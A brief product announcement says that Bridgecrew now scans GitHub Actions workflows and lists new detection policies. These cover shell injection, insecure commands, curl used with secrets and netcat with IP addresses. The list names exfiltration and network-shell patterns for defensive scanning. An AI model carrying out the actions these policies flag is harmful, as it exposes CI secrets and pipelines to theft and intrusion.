GitHub Actions workflow configuration scan results in Bridgecrew ⚡

Bridgecrew now automatically scans and identifies misconfigurations in any GitHub Actions workflow files that are found in onboarded repositories. CLI results will also appear in the platform when scans are performed locally or in a CI pipeline.

Onboarded repositories that have GitHub Actions workflow files found in the .github directory will be scanned for configurations that could expose a pipeline to attack, such as secrets exfiltration and code injection. The new policies include:

  • Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables
  • Ensure run commands are not vulnerable to shell injection
  • Suspicious use of curl with secrets
  • Suspicious use of netcat with IP address